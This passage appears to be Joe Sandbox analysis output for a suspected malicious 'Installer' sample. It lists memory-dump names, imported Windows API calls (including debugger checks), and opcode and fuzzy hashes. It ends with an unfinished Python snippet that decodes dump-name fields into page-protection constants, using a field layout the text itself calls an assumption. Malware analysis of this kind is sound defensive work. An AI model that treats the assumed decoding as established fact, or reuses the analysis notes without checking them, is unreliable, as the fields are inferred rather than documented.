                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 2c167b4b0039bd756b281d825a45d5120e7a9c05044718806fc73d46f5afa8f2
                                                                                                                                                                                                                                                    • Instruction ID: bfe3b6b7836ed94dedc62495c109952a8701225529e2190ca0509d46ed6dff66
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c167b4b0039bd756b281d825a45d5120e7a9c05044718806fc73d46f5afa8f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E08C32204A18ABCB232FA5FC09F997B6CEB00392F114021FA0C9A170CB308984CB94
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 195468f8685eb514b79ab8d78a92d9b1e4f1fcbc5879ca3cb491894e14d77642
                                                                                                                                                                                                                                                    • Instruction ID: fac68d4961254ff9098b8b8d4170e0bc1ec2d1a80ce369fc05c5256d50bbf608
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 195468f8685eb514b79ab8d78a92d9b1e4f1fcbc5879ca3cb491894e14d77642
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8341B031A0011AAFCB26DF69D8909EDB7F9FF18310F54406AE446EBA40EB31F945DB90
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a8dbf606c9d1d54a760a21b710172b977622ccf535d4300ba4120210ac379f2
• Instruction ID: 71bd84ac52775869fa49e3146d0c51a3d7532c518e7b92ec830cab13460f11df
• Opcode Fuzzy Hash: 2a8dbf606c9d1d54a760a21b710172b977622ccf535d4300ba4120210ac379f2
• Instruction Fuzzy Hash: 7F31B47291110AAFCB52CE68D8809EDB7F8FF09320B14122AE515EB690D731FD45CB90
APIs
  • Part of subcall function 0034AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00348A2A,?,?,0034AF87,00348A2A,?,0034AF58,00348A2A,?,?,?), ref: 0034AFD0
• FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,C82EE5EC,?,?,?,Function_0002BE94,000000FF), ref: 0034B0C7
  • Part of subcall function 0034AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 0034AF1B
  • Part of subcall function 0034EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00348E4A,0034A2F0), ref: 0034EFE7
Similarity
• API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
• String ID:
• API String ID: 3627539351-0
• Opcode ID: 1456c70a568e9f8337984f12e3e139ec58740894356678fd8916508bc0c8d36b
• Instruction ID: e1b4c33e30b72034941c009e9eb9dbd5da14c26019fbcbd2e4c84ab636f45d8f
• Opcode Fuzzy Hash: 1456c70a568e9f8337984f12e3e139ec58740894356678fd8916508bc0c8d36b
• Instruction Fuzzy Hash: 14110432640A40ABCB3B6B659C12A2EB7E9FB41B20F01441EF4199F6D0CF39FC40DA41
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ce16859dcbe7434fb9f3c21d48ab2e12de958904260ec530025b56edc0f7b54
• Instruction ID: f4c7395b41f5ffc65fc0cd9923e20220e12369910b760d92f5acb18404426d26
• Opcode Fuzzy Hash: 3ce16859dcbe7434fb9f3c21d48ab2e12de958904260ec530025b56edc0f7b54
• Instruction Fuzzy Hash: 6701F5332102155FDB379E68EC41E2673BEBBC0761F264024FE089B5E4DB31D846A750
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0
• Opcode ID: c2fa7ffa83f0417901b80842ac7290403ef21fea0bd79a819b82f64a35e5e234
• Instruction ID: 2f59e8d4f91e1b80611095bb0732a14e555da04d336125908ec2e46dc3743e81
• Opcode Fuzzy Hash: c2fa7ffa83f0417901b80842ac7290403ef21fea0bd79a819b82f64a35e5e234
• Instruction Fuzzy Hash: B501947622A2824ECB878B78F8B52A8BB90FF91334B20A16FD0118C4D1CB127811C300
APIs
• Concurrency::details::_Release_chore.LIBCPMT ref: 003477C6
  • Part of subcall function 0034AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,003478DA,00000000), ref: 0034AF72
Similarity
• API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
• String ID:
• API String ID: 312417170-0
• Opcode ID: c1d4b784f005c49fed4733d535ecbe35587a822deb5f5a4c5723f6024c70fa46
• Instruction ID: b1095484f51d19f592d224f6a2e42800b904b4a5087f4a05280d52c26feab014
• Opcode Fuzzy Hash: c1d4b784f005c49fed4733d535ecbe35587a822deb5f5a4c5723f6024c70fa46
• Instruction Fuzzy Hash: 37014BB1C406599BDB01EF94DC4679EFBB4FB44720F004239E8196B351E379AA85CBD2
APIs
• RtlAllocateHeap.NTDLL(00000000,0035DF35,?,?,0035DF35,00000220,?,00000000,?), ref: 0035BF43
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                                    • Opcode ID: dbb9865109fe913667b317b7f36e26ae0167a2e4377642bc5bca624132f00949
                                                                                                                                                                                                                                                    • Instruction ID: ecc0edb5debecdb25a097323aa2331699609388d9a2e054644dd3b1424e51608
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbb9865109fe913667b317b7f36e26ae0167a2e4377642bc5bca624132f00949
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E06D31219A2166DB332A66AC01F5ABA5C9F41BA3F160161EC5D9A1B0DB20EC48D9B1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0034990F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 118556049-0
                                                                                                                                                                                                                                                    • Opcode ID: 1b9d5162fc47b30889bd4cfe6d5094b808955b65bcac724bd68f84af60835245
                                                                                                                                                                                                                                                    • Instruction ID: 4f97b0e5e650c2775d85e0e395c26b5769275bd6b65d0c80d20e947745f5a62c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b9d5162fc47b30889bd4cfe6d5094b808955b65bcac724bd68f84af60835245
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6D0A7397014244F87267F29A81892EF3A5FFC9720357449AE944DB346CB24EC4287C0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0036138F
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 003613CD
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 003613E0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00361428
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00361443
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: ,K7
                                                                                                                                                                                                                                                    • API String ID: 415426439-1697011031
                                                                                                                                                                                                                                                    • Opcode ID: 23504dfc4e933c69730e0f5e92233b4a1b2a0716b6130f3ba639b71e2626cbc7
                                                                                                                                                                                                                                                    • Instruction ID: c32a4522b7336582df8ba3b5243482cd12176ad5297fe9fc78d10fb8d6e83ebd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23504dfc4e933c69730e0f5e92233b4a1b2a0716b6130f3ba639b71e2626cbc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44517072A10605AFDB23DFA5CC45EBE77B8EF05700F198469F905EB194EB709A44CB60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                    • Opcode ID: bd180fe2becad37b3b9bbbae10df5dab0290f65977afa914f3cdd857468d12f5
                                                                                                                                                                                                                                                    • Instruction ID: 68c879eb25a54110ff89f2ded94ba24dd598ea910a7fce6f7cc88bb04180cf15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd180fe2becad37b3b9bbbae10df5dab0290f65977afa914f3cdd857468d12f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AD24E71E082288FDB66CF24DC44BEAB7B5EB48305F1586EAD40DE7244DB74AE858F41
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AA0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AC9
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,003613BD,?,00000000), ref: 00361ADE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
• Instruction ID: 2ea98b674b87bdf1db4fa5ce46ef860c48b9a2afc83c2a117bc9dacec4f631cf
• Opcode Fuzzy Hash: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
• Instruction Fuzzy Hash: 84218622B02101ABD737CFE5C901A9772BAEB54B54B5FC564E90ADB20CE732DD40D350
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
• Instruction ID: ca032691a71f72c14cc1531e28e5ac15cbca6907ad26b225a267cf54a867a23a
• Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
• Instruction Fuzzy Hash: A4024D71E006199BDF15CFA8C880BAEBBF1FF48315F25826AD915E7390D731AA05CB90
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0034F8F5
• IsDebuggerPresent.KERNEL32 ref: 0034F9C1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034F9DA
• UnhandledExceptionFilter.KERNEL32(?), ref: 0034F9E4
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
• Instruction ID: 138bf7a91a1b20c4f867558ebdda8feab40f320dd9812732851e6fe31b3834a4
• Opcode Fuzzy Hash: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
• Instruction Fuzzy Hash: 7A31D775D052199BDF22DFA5D949BCDBBF8AF08300F1041AAE40DAB250EB719A848F45
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003615D4
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0036161E
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003616E4
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 2bba436f0dcdae3cce946fc537dc2ca249dbecfad6e922fa8342c3839e0edbfe
• Instruction ID: b583f89e42aa7aa209f33d818afbb341140c27d6e6929f9c6582cfb99a41d995
• Opcode Fuzzy Hash: 2bba436f0dcdae3cce946fc537dc2ca249dbecfad6e922fa8342c3839e0edbfe
• Instruction Fuzzy Hash: 4061D2719102079FDB2A9F24CC82BBA77B8EF14701F2981B9ED05CB589E734D994DB50
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00357F28
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00357F32
• UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00357F3F
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: ca403ceeb616511b4ca8952af1ac2e6d533dee77bddd1ecf5e7d17df049ac25c
• Instruction ID: 72f26331597c6123a2b9fe4f5076a867911e0465513341e6c127f91c46e633f3
• Opcode Fuzzy Hash: ca403ceeb616511b4ca8952af1ac2e6d533dee77bddd1ecf5e7d17df049ac25c
• Instruction Fuzzy Hash: 6131C77491121C9BCB22DF64DC89B8DBBB8BF08311F5041EAE80DAB261E7709F858F45
APIs
• GetSystemTimePreciseAsFileTime.KERNEL32 ref: 003500EC
• GetSystemTimeAsFileTime.KERNEL32(?,C82EE5EC,00348E30,?,0036BE77,000000FF,?,0034FDB4,?,00000000,00000000,?,0034FDD8,?,00348E30,?), ref: 003500F0
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 743729956-0
                                                                                                                                                                                                                                                    • Opcode ID: 1a9c0d5cacb4e7278b41ea325a4a754547a34ca3e65e456224b521d9f347aa15
                                                                                                                                                                                                                                                    • Instruction ID: 8fafe73069523df2e1bf02fa8f1dcf64ec4dbd3399955702cdf96d1f02155d09
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a9c0d5cacb4e7278b41ea325a4a754547a34ca3e65e456224b521d9f347aa15
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F06532A48A58EFC7279F44DC05F9EB7ACF708B10F01412AED16937A0DB35A940DB80
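The memory-dump names listed in every function record above carry the region's base address and what look like Win32 page-protection and memory-type values. The snippet below is an added example, not part of the Joe Sandbox report or of its tooling: it parses those `.sdmp` names and decodes the fields with the documented Win32 constants (PAGE_READONLY = 0x02, PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40, MEM_IMAGE = 0x1000000). The field layout `<proc>.<stage>.<dump id>.<base>.<protect>.<unknown>.<type>.<unknown>.sdmp` is an assumption inferred from the values on this page, not a documented format, and the two fields marked unknown are left undecoded. The sample input is a copy of the dump list printed above. Under that assumed decoding, the one-page region at 0037A000 is both writable and executable inside a MEM_IMAGE mapping, which is the kind of region worth pulling first from a sample that injects code into other processes.

```python
import re
from dataclasses import dataclass

# Documented Win32 values for MEMORY_BASIC_INFORMATION.Protect
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
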